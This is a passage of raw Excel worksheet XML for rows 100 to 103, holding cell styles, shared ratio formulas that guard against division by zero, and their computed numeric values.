      <c r="AS100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AT100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AU100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AV100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AW100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AX100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="AY100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="AZ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BA100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BB100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BC100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BD100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BE100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BF100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BG100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BH100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BI100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BJ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BK100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BL100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BM100" s="518">
        <f t="shared" si="116"/>
        <v>0.1719319563</v>
      </c>
      <c r="BN100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BO100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BP100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BQ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BR100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BS100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BT100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BU100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BV100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BW100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BX100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="BY100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BZ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CA100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CB100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CC100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CD100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CE100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CF100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CG100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CH100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CI100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CJ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CK100" s="518">
        <f t="shared" si="116"/>
        <v>1</v>
      </c>
      <c r="CL100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CM100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CN100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CO100" s="518">
        <f t="shared" si="116"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CQ100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CR100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CS100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CT100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CU100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CV100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CW100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="CX100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CY100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="CZ100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="DA100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="DB100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="DC100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="DD100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="DE100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="DF100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="DG100" s="518" t="str">
        <f t="shared" si="116"/>
        <v>-</v>
      </c>
      <c r="DH100" s="518">
        <f t="shared" si="116"/>
        <v>0.04</v>
      </c>
      <c r="DI100" s="518">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="DJ100" s="519">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="DK100" s="271"/>
      <c r="DO100" s="279"/>
      <c r="DP100" s="271"/>
      <c r="DU100" s="271"/>
      <c r="DV100" s="271"/>
      <c r="EA100" s="271"/>
      <c r="EB100" s="271"/>
      <c r="EC100" s="271"/>
      <c r="ED100" s="280"/>
      <c r="EG100" s="279"/>
      <c r="EH100" s="271"/>
      <c r="EI100" s="271"/>
      <c r="EJ100" s="271"/>
      <c r="EK100" s="271"/>
      <c r="EL100" s="271"/>
      <c r="EM100" s="271"/>
      <c r="ER100" s="271"/>
      <c r="ES100" s="271"/>
      <c r="ET100" s="271"/>
      <c r="EU100" s="271"/>
      <c r="EV100" s="271"/>
      <c r="EW100" s="271"/>
      <c r="EX100" s="271"/>
      <c r="EY100" s="271"/>
      <c r="EZ100" s="271"/>
      <c r="FA100" s="280"/>
    </row>
    <row r="101">
      <c r="J101" s="277"/>
      <c r="K101" s="521">
        <f t="shared" ref="K101:N101" si="117">K67/$N$31</f>
        <v>0.2289727365</v>
      </c>
      <c r="L101" s="522">
        <f t="shared" si="117"/>
        <v>0.2055107892</v>
      </c>
      <c r="M101" s="522">
        <f t="shared" si="117"/>
        <v>0.8589329411</v>
      </c>
      <c r="N101" s="523">
        <f t="shared" si="117"/>
        <v>0.7420359888</v>
      </c>
      <c r="O101" s="278"/>
      <c r="Q101" s="271"/>
      <c r="R101" s="352" t="s">
        <v>2571</v>
      </c>
      <c r="S101" s="501">
        <f t="shared" ref="S101:V101" si="118">IF(S$34=0,"-",S53/S$34)</f>
        <v>0.01161665053</v>
      </c>
      <c r="T101" s="501" t="str">
        <f t="shared" si="118"/>
        <v>-</v>
      </c>
      <c r="U101" s="501">
        <f t="shared" si="118"/>
        <v>0.8412698413</v>
      </c>
      <c r="V101" s="501">
        <f t="shared" si="118"/>
        <v>0.8947368421</v>
      </c>
      <c r="W101" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X101" s="501">
        <f t="shared" ref="X101:AF101" si="119">IF(X$34=0,"-",X53/X$34)</f>
        <v>0</v>
      </c>
      <c r="Y101" s="501">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="Z101" s="501">
        <f t="shared" si="119"/>
        <v>0.06715449074</v>
      </c>
      <c r="AA101" s="501">
        <f t="shared" si="119"/>
        <v>0.0144092219</v>
      </c>
      <c r="AB101" s="501">
        <f t="shared" si="119"/>
        <v>0.7391304348</v>
      </c>
      <c r="AC101" s="501">
        <f t="shared" si="119"/>
        <v>0.3</v>
      </c>
      <c r="AD101" s="501">
        <f t="shared" si="119"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE101" s="501">
        <f t="shared" si="119"/>
        <v>0.5555555556</v>
      </c>
      <c r="AF101" s="502">
        <f t="shared" si="119"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG101" s="271"/>
      <c r="AH101" s="352" t="s">
        <v>2571</v>
      </c>
      <c r="AI101" s="518">
        <f t="shared" ref="AI101:DJ101" si="120">IF(AI$30=0,"-",AI53/AI$30)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="AK101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="AL101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="AM101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="AN101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AO101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AP101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AQ101" s="518">
        <f t="shared" si="120"/>
        <v>0.8803418803</v>
      </c>
      <c r="AR101" s="518">
        <f t="shared" si="120"/>
        <v>0.25</v>
      </c>
      <c r="AS101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AT101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="AU101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="AV101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="AW101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AX101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="AY101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="AZ101" s="518">
        <f t="shared" si="120"/>
        <v>0.5</v>
      </c>
      <c r="BA101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BB101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BC101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BD101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BE101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BF101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BG101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BH101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BI101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BJ101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BK101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BL101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="BM101" s="518">
        <f t="shared" si="120"/>
        <v>0.1719319563</v>
      </c>
      <c r="BN101" s="518">
        <f t="shared" si="120"/>
        <v>0.0003861003861</v>
      </c>
      <c r="BO101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BP101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BQ101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BR101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BS101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="BT101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BV101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BW101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BX101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="BY101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BZ101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CA101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CB101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CC101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CD101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CE101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CF101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="CG101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CH101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CI101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CJ101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CK101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="CL101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CM101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CN101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CO101" s="518">
        <f t="shared" si="120"/>
        <v>0.3333333333</v>
      </c>
      <c r="CP101" s="518">
        <f t="shared" si="120"/>
        <v>0.5</v>
      </c>
      <c r="CQ101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CR101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CS101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CT101" s="518">
        <f t="shared" si="120"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CV101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CW101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="CX101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CY101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="CZ101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="DA101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="DB101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="DC101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="DD101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="DE101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="DF101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="DG101" s="518" t="str">
        <f t="shared" si="120"/>
        <v>-</v>
      </c>
      <c r="DH101" s="518">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="DI101" s="518">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="DJ101" s="519">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="DK101" s="271"/>
      <c r="DO101" s="279"/>
      <c r="DP101" s="271"/>
      <c r="DU101" s="271"/>
      <c r="DV101" s="271"/>
      <c r="EA101" s="271"/>
      <c r="EB101" s="271"/>
      <c r="EC101" s="271"/>
      <c r="ED101" s="280"/>
      <c r="EG101" s="279"/>
      <c r="EH101" s="271"/>
      <c r="EI101" s="271"/>
      <c r="EJ101" s="271"/>
      <c r="EK101" s="271"/>
      <c r="EL101" s="271"/>
      <c r="EM101" s="271"/>
      <c r="ER101" s="271"/>
      <c r="ES101" s="271"/>
      <c r="ET101" s="271"/>
      <c r="EU101" s="271"/>
      <c r="EV101" s="271"/>
      <c r="EW101" s="271"/>
      <c r="EX101" s="271"/>
      <c r="EY101" s="271"/>
      <c r="EZ101" s="271"/>
      <c r="FA101" s="280"/>
    </row>
    <row r="102">
      <c r="J102" s="277"/>
      <c r="K102" s="271"/>
      <c r="L102" s="271"/>
      <c r="M102" s="271"/>
      <c r="N102" s="271"/>
      <c r="O102" s="278"/>
      <c r="Q102" s="271"/>
      <c r="R102" s="352" t="s">
        <v>2572</v>
      </c>
      <c r="S102" s="501">
        <f t="shared" ref="S102:V102" si="121">IF(S$34=0,"-",S54/S$34)</f>
        <v>0.01161665053</v>
      </c>
      <c r="T102" s="501" t="str">
        <f t="shared" si="121"/>
        <v>-</v>
      </c>
      <c r="U102" s="501">
        <f t="shared" si="121"/>
        <v>0.8571428571</v>
      </c>
      <c r="V102" s="501">
        <f t="shared" si="121"/>
        <v>0.8947368421</v>
      </c>
      <c r="W102" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X102" s="501">
        <f t="shared" ref="X102:AF102" si="122">IF(X$34=0,"-",X54/X$34)</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y102" s="501">
        <f t="shared" si="122"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z102" s="501">
        <f t="shared" si="122"/>
        <v>0.06739053464</v>
      </c>
      <c r="AA102" s="501">
        <f t="shared" si="122"/>
        <v>0.9625360231</v>
      </c>
      <c r="AB102" s="501">
        <f t="shared" si="122"/>
        <v>0.8260869565</v>
      </c>
      <c r="AC102" s="501">
        <f t="shared" si="122"/>
        <v>0.7</v>
      </c>
      <c r="AD102" s="501">
        <f t="shared" si="122"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE102" s="501">
        <f t="shared" si="122"/>
        <v>0.5555555556</v>
      </c>
      <c r="AF102" s="502">
        <f t="shared" si="122"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG102" s="271"/>
      <c r="AH102" s="352" t="s">
        <v>2572</v>
      </c>
      <c r="AI102" s="518">
        <f t="shared" ref="AI102:DJ102" si="123">IF(AI$30=0,"-",AI54/AI$30)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="AK102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="AL102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="AM102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="AN102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AO102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AP102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AQ102" s="518">
        <f t="shared" si="123"/>
        <v>0.8974358974</v>
      </c>
      <c r="AR102" s="518">
        <f t="shared" si="123"/>
        <v>0.25</v>
      </c>
      <c r="AS102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AT102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="AU102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="AV102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="AW102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AX102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="AY102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="AZ102" s="518">
        <f t="shared" si="123"/>
        <v>0.5</v>
      </c>
      <c r="BA102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BB102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BC102" s="518">
        <f t="shared" si="123"/>
        <v>0.6666666667</v>
      </c>
      <c r="BD102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BE102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="BF102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BG102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="BH102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BI102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BJ102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BK102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BL102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="BM102" s="518">
        <f t="shared" si="123"/>
        <v>0.1725394897</v>
      </c>
      <c r="BN102" s="518">
        <f t="shared" si="123"/>
        <v>0.0003861003861</v>
      </c>
      <c r="BO102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BP102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BQ102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="BR102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BS102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="BT102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BU102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BV102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BW102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="BX102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="BY102" s="518">
        <f t="shared" si="123"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CA102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CB102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CC102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CD102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CE102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CF102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CG102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CH102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CI102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CJ102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CK102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CL102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CM102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CN102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CO102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="CP102" s="518">
        <f t="shared" si="123"/>
        <v>0.5</v>
      </c>
      <c r="CQ102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CR102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CS102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CT102" s="518">
        <f t="shared" si="123"/>
        <v>0.005988023952</v>
      </c>
      <c r="CU102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CV102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CW102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="CX102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CY102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="CZ102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="DA102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="DB102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="DC102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="DD102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DE102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DF102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DG102" s="518" t="str">
        <f t="shared" si="123"/>
        <v>-</v>
      </c>
      <c r="DH102" s="518">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DI102" s="518">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DJ102" s="519">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DK102" s="271"/>
      <c r="DO102" s="279"/>
      <c r="DP102" s="271"/>
      <c r="DU102" s="271"/>
      <c r="DV102" s="271"/>
      <c r="EA102" s="271"/>
      <c r="EB102" s="271"/>
      <c r="EC102" s="271"/>
      <c r="ED102" s="280"/>
      <c r="EG102" s="279"/>
      <c r="EH102" s="271"/>
      <c r="EI102" s="271"/>
      <c r="EJ102" s="271"/>
      <c r="EK102" s="271"/>
      <c r="EL102" s="271"/>
      <c r="EM102" s="271"/>
      <c r="ER102" s="271"/>
      <c r="ES102" s="271"/>
      <c r="ET102" s="271"/>
      <c r="EU102" s="271"/>
      <c r="EV102" s="271"/>
      <c r="EW102" s="271"/>
      <c r="EX102" s="271"/>
      <c r="EY102" s="271"/>
      <c r="EZ102" s="271"/>
      <c r="FA102" s="280"/>
    </row>
    <row r="103">
      <c r="J103" s="277"/>
      <c r="K103" s="271"/>
      <c r="L103" s="271"/>
      <c r="M103" s="271"/>
      <c r="N103" s="271"/>
      <c r="O103" s="278"/>
      <c r="Q103" s="271"/>
      <c r="R103" s="352" t="s">
        <v>2573</v>
      </c>
      <c r="S103" s="501">
        <f t="shared" ref="S103:V103" si="124">IF(S$34=0,"-",S55/S$34)</f>
        <v>0.01355275895</v>
      </c>
      <c r="T103" s="501" t="str">
        <f t="shared" si="124"/>
        <v>-</v>
      </c>
      <c r="U103" s="501">
        <f t="shared" si="124"/>
        <v>0.8888888889</v>
      </c>
      <c r="V103" s="501">
        <f t="shared" si="124"/>
        <v>0.8947368421</v>
      </c>
      <c r="W103" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X103" s="501">
        <f t="shared" ref="X103:AF103" si="125">IF(X$34=0,"-",X55/X$34)</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y103" s="501">
        <f t="shared" si="125"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z103" s="501">
        <f t="shared" si="125"/>
        <v>0.06833471026</v>
      </c>
      <c r="AA103" s="501">
        <f t="shared" si="125"/>
        <v>0.9855907781</v>
      </c>
      <c r="AB103" s="501">
        <f t="shared" si="125"/>
        <v>0.8260869565</v>
      </c>
      <c r="AC103" s="501">
        <f t="shared" si="125"/>
        <v>0.8</v>
      </c>
      <c r="AD103" s="501">
        <f t="shared" si="125"/>
        <v>0.005970149254</v>
      </c>
      <c r="AE103" s="501">
        <f t="shared" si="125"/>
        <v>0.6666666667</v>
      </c>
      <c r="AF103" s="502">
        <f t="shared" si="125"/>
        <v>0.9978354978</v>
      </c>
      <c r="AG103" s="271"/>
      <c r="AH103" s="352" t="s">
        <v>2573</v>
      </c>
      <c r="AI103" s="518">
        <f t="shared" ref="AI103:DJ103" si="126">IF(AI$30=0,"-",AI55/AI$30)</f>
        <v>0.001688073394</v>
      </c>
      <c r="AJ103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="AK103" s="518">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="AL103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="AM103" s="518">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="AN103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AO103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AP103" s="518" t="str">
        <f t="shared" si="126"/>
        <v>-</v>
      </c>
      <c r="AQ103" s="518">
        <f t="shared" si="126"/>
        <v>0.9145299145</v>
      </c>
      <c r="AR103" s="518">
        <f t="shared" si="126"/>
        <v>0.25</v>
      </c>
